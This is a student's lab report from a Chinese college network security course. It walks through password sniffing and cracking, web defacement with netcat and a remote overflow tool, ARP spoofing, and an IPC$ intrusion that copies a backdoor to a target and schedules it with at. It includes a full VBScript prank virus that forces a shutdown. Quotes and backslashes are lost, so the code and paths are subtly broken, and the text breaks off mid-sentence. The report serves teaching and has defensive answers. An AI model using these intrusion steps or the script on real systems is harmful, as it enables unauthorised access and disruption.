任如意的网络作业.doc

网络安全实训网络与信息安全管理实训报告系 别：计算机工程系 班 级：网09 姓 名：任如意 学 号：10503090926 指导老师：焦锋 武鹏实训时间：2011.12.12-2011.12.23 实训目的：为了使同学们在经过一学期的学习之后，对所学的知识有更加直观的了解，使动手能力得到进一步提高，同时根据学校的现有条件，特设置以下实习内容目录。目 录1 口令攻击实训32 网页篡改实训43 密码暴力破解实训54 网页恶意代码与计算机病毒实训65 数字认证实训76 ARP攻击与防护实训87 Windows 2000 IPC$入侵实训98 实训体会10一、口令攻击实训工作页工作页口令攻击学习情境 口令攻击学习领域网络安全班级网09姓 名任如意学习小组第二组工作时间2011年12月19日任务描述利用口令猜测与网络窃听进行口令破解1. 使用黑客字典生成器，破解口令2. 使用抓包工具进行监听并分析数据包，破解口令【实训重点及难点】重点：掌握理解口令攻击的主要方法，了解防范手段 【实训拓扑】【实训步骤】在黑客端安装sniffer嗅探工具，Wireshark网络分析工具，Cain password sniffer工具。1.使用sniffer嗅探工具，获取端口21-端口23的数据包，并加以分析。2.也可使用Wireshark网络分析工具，设置抓包条件（端口区间，ftp，telnet等），抓取并分析数据包，找出包中所含的明文密码，账户信息。然后对FTP等进行攻击。3.Cain password sniffer工具是一种专业的sniffer口令工具,支持各种破解方式,服务,解码技术.5. 思考题口令攻击的防护手段有哪些？答：1、口令尽可能设置得复杂2、定时修改密码3、注意保护口令的安全。二、网页篡改实训工作页工作页首页篡改学习情境网页篡改学习领域网络安全班级网09姓 名任如意学习小组第二组工作时间2011年12月16日任务描述l 建立web站点，并发布。l 建立连接，将web站点发布在pc2上。l 利用pc1通过网络对pc2进行网页篡改，并验证。【实训重点及难点】重点：理解如何发起网页篡改攻击，了解网页篡改的步骤【实训步骤】1. 为黑客端电脑准备netcat 1.11 for windows.exe(瑞士军刀) ，exbsd.exe(远程溢出工具) ，tftpd server(tftp上传下载工具)2. 在用户端主机上安装web服务并建立web站点，在其根目录下创建一个html页面。3. 在黑客端测试站点网页4. 开启一个命令行窗口，用 nc.exe 程序连接目标主机的 80 端口，输入 GET /abcdefg HTTP/1.0 并连续输入两次回车（Enter），可以从返回中获取服务器版本信息。命令中的 abcdefg 是任意字符串，是不存在的页面，会引起404错误。这么做的理由是 404错误的返回页面内容比较少，便于查看。5. 用 exbsd.exe 尝试远程溢出 , 命令格式为 exbsd.exe -t 目标主机IP地址。6. 命令格式为 nc.exe 目标主机IP地址 目标端口。7.找到web网页的存放位置，使用tftp工具下载到黑客本机，进行修改8.将修改成功的html页面上传并覆盖到用户电脑，完成网页篡改实验。5. 思考题防止web服务的手段有哪些？1、 磁盘权限设置2、 SQL数据库设置3、 端口设置4、 禁用不需要的服务5、 卸载危险组件6、 更改3389端口三、密码暴力破解实训工作页工作页密码暴力破解学习情境密码暴力破解学习领域网络安全班级网09姓 名 任如意学习小组第二组工作时间2011年12月20日任务描述l 系统账户数据库本地口令文件暴力破解u 暴力破解Windows下的SAM文件u 暴力破解Linux/Unix下的shadow文件l 在线远程服务口令暴力破解【实训重点及难点】重点：掌握理解如何破解SAM数据库，了解密码破解工具的使用方法，掌握安全口令的设置原则【实训步骤】1. 使用L0phtCrack5（1）在主机内建立若干用户名，将其密码分别设置为空密码、纯数字组合密码、特定单词字母密码、任意字母组合密码、字母数字混合密码以及特殊符号字母数字混合密码。（2）通过L0phtCrack5文件菜单中的LCS向导，设定从本地机器导入加密口令，分别对本地机器进行“快速口令破解”和“普通口令破解”，观察破解结果（要等一段时间直到破解完全结束）。注意：若采用“复杂口令破解”方式，则需要23小时的时间破解。.设置密码原则：不小于8字符；包含有大小写英文字母、数字和特殊符号的组合；不包含姓名、用户名、单词、日期以及这几项的组合；定期修改密码。.密码破解的防护措施.Syskey工具可以使用启动密钥来保护SAM文件中的账号信息。.在“开始运行”对话框中输入“Syskey”，启用加密。2. 使用MD5Crack破解工具（1）在MD5Crack程序的“破解单个密文”文本框中输入图2生成的123456的MD5密文，确保使用的是“数字”字符集字典（2）点击“开始”按钮，开始MD5破解，简单有规律的明文生成的MD5密文将很快被破解出来。3. 暴力破解linux下的shadow文件（1）点击Windows开始菜单中的“运行”，输入cmd，确定后系统会调用cmd命令行界面。（2）使用cd命令，跳转到john解压的run目录（这里解压到d盘的john1701目录）（3）将我们提供的字典文件pass.txt和Linux/Unix账户信息文件shadow复制到run目录，以便破解。（4）直接输入 # john-386.exe -wordlist=pass.txt -rules shadow5. 思考题系统账户数据库在哪里？:WINDOWSsystem32configSAM 四、网页恶意代码与计算机病毒实训工作页工作页网页恶意代码与计算机病毒学习情境 网页恶意代码与计算机病毒学习领域网络安全班级网09 姓 名任如意学习小组第二组工作时间2011年12月22日任务描述l 尝试编写一段病毒程序，并测试验证。【实训重点及难点】重点：掌握理解计算机病毒的原理，了解遭到计算机病毒攻击的现象【实训步骤】1. 病毒源码：on error resume next dim WSHshellA set WSHshellA = wscript.createobject(wscript.shell) WSHshellA.run cmd.exe /c shutdown -r -t 60 -c 你好，信不信一分钟关你机，除非说你是猪，不信，试试 ,0 ,true dim a do while(a 我是猪) a = inputbox (说我是猪,就不关机，快撒，说 我是猪,说不说,不说,就关机,8000,7000) msgbox chr(13) + chr(13) + chr(13) + a,0,MsgBox loop msgbox chr(13) + chr(13) + chr(13) + 早说就行了嘛 dim WSHshell set WSHshell = wscript.createobject(wscript.shell) WSHshell.run cmd.exe /c shutdown -a,0 ,true msgbox chr(13) + chr(13) + chr(13) + 哈哈哈哈，真过瘾 2. 将以上代码复制到txt文本编辑器中保存，将扩展名改为 .vbe ,传送到目标机器运行。5. 思考题计算机病毒可能传播病毒的途径？答：通过软盘，通过网络，通过光盘，通过硬盘 五、数字认证实训工作页工作页数字认证学习情境数字认证学习领域网络安全班级网09 姓 名任如意学习小组第二组工作时间2011年12月21日任务描述l 申请并安装一个客户端证书 l 查看X509数字证书包含的基本信息l 查看处理后证书请求的状态 l 吊销一个证书，并查看证书吊销列表【实训重点及难点】重点：掌握数字证书的配置内容及配置方法，了解数字证书的作用及使用方法，掌握使用数字证书访问安全站点的方法 【实训步骤】点击开始-程序-管理工具-证书颁发机构，打开证书颁发机构界面展开Course Root CA，并选择颁发的证书，窗口右边的已颁发证书列表中可以看到证书颁发机构已经颁发过一个证书右击该证书，选择所有任务，再点击吊销证书在弹出的窗口中，理由选择密钥泄漏，然后点击”是”在展开的Course Root CA下选择吊销的证书，可以在右边的吊销列表中看到刚才吊销的证书，在右边列表的空白地方右击，然后选择所有任务，再点击发行，在吊销证书列表中双击刚才吊销的证书，查看信息，可以发现该证书已经显示为被颁发机构吊销， 关闭窗口。 六、 ARP攻击与防护实训工作页工作页ARP攻击与防护学习情境ARP攻击与防护学习领域网络安全班级网09 姓 名任如意学习小组第二组工作时间2011年12月13日任务描述根据拓扑实施ARP攻击【实训重点及难点】重点：掌握理解ARP欺骗攻击，了解抵御方法【实训拓扑】【实训步骤】1. 在黑客端准备sniffer抓包工具，在软件的自定义过滤器中选择IP ARP，ARP，ICMP等，运行工具；2. 通过对抓取的包分析，获知网关与用户的IP和MAC地址，在命令提示符中输入ipconfig /all找出自己的IP地址和MAC地址；3. 使用抓取的一个ARP包进行修改，修改完成后将以此种身份向目标主机发送虚假的数据包信息。5. 思考题 1.ARP协议工作原理是什么：ARP协议建立IP地址与MAC地址之间的对应（映射）关系，TCP/IP协议栈维护着一个ARP cache表，在构造网络数据包时，首先从ARP表中找目标IP对应的MAC地址，如果找不到，就发一个ARP request广播包，请求具有该IP地址的主机报告它的MAC地址，当收到目标IP所有者的ARP reply后，更新ARPcache.ARP cache有老化机制。（2）ARP协议欺骗原理是什么：每台安装有TCP/IP协议的电脑和交换机里都有一个ARP缓存表，表里的IP地址与MAC地址是一一对应的，ARP缓存表使用帧的源地址填充，如果帧的源地址被错误更改为其他，就能达到arp欺骗，可以通过假冒ARP reply包（单播），假冒ARP reply包（广播），假冒ARP request（广播），假冒ARP request（单播），假冒中间人，由于ARP Cache的老化机制，有时还需要做周期性连续欺骗。（3）如何判断正在遭受ARP攻击：运行-cmd-arp -a，查看路由绑定情况是否可疑；下载并安装ARP防火墙，查看内网是否存在混杂模式的网卡，有，那就是正在遭受攻击。（4） 如何防范和解决ARP攻击：防范的方法是双向绑定。在PC上绑定路由器的IP和MAC地址，在路由器上绑定用户主机的IP和MAC地址。运用ARP防火墙七、Windows 2000 IPC$入侵实训工作页工作页Windows 2000 IPC$入侵学习情境Windows 2000 IPC$入侵学习领域网络安全班级网09姓 名任如意学习小组第二组工作时间2011-12-1415任务描述1.向目标主机上传木马，定时开启目标主机的某些程序。2.修改目标主机的桌面【实训重点及难点】重点：解空会话、ipc$所使用的端口、ipc管道在hack攻击中的意义、关于at命令和xp对ipc$的限制、如何打开目标的IPC$共享以及其他共享，如何防范ipc$入侵【实训拓扑】目标ip：8【实训步骤】1. 试图连接目标主机，命令：net use 8ipc$ /user:administrators2. 将后门程序G_SERVER.EXE复制到对方的系统文件夹下，所用命令：copy G_SERVER.EXE admin$system323. 查看目标主机的当前时间，然后定时开启其上一项程序：at 8 时间 winmine.exe4. 定时开启程序G_SERVER.EXE：at 8时间 G_SERVER.EXE5. 完成修改主页任务5. 思考题(1.)什么是ipc$：IPC$是共享 命名管道 的资源：它是为了让进程间通信而开放的命名管道，通过提供可信任的用户名和口令，连接双方可以建立安全的通道并以此通道进行加密数据的交换，从而实现对远程计算机的访问。(2. )什么是空会话：空会话是在没有信任的情况下与服务器建立的会话（即未提供用户名与密码）（3. ）空会话可以做什么：查看远程主机的共享资源；查看远程主机的当前时间；得到远程主机的 NetBIOS 用户名列表（需要打开自己的 NBT ）（4. ）ipc$用到的端口：对于服务端，端口号为UDP138，137，TCP为139，445，对于客户端，端口号为139，445（5. ）ipc管道在hack攻击中的意义：通过 ipc 管道，我们可以远程调用一些系统函数（大多通过工具实现，但需要相应的权限），这往往是入侵成败的关键。（6. ）ipc$链接失败的原因： 对方不是Windows NT 及以上系统中特有的功能；对方没有开启ipc$的共享；连接发起方未启动 Lanmanworkstation 服务；响应方未启动 Lanmanserver 服务；响应方未启动 NetLogon；响应方的 139 ， 445 端口未处于监听状态或被防火墙屏蔽；连接发起方未打开 139 ， 445 端口（7. ）复制文件失败的原因：对方未开启共享ipc$文件夹；用户权限不够；局域网拦截（8. ）关于at命令和xp对ipc$的限制：在 xp 的默认安全选项中，任何远程访问仅被赋予来宾权限，也就是说即使你是用管理员帐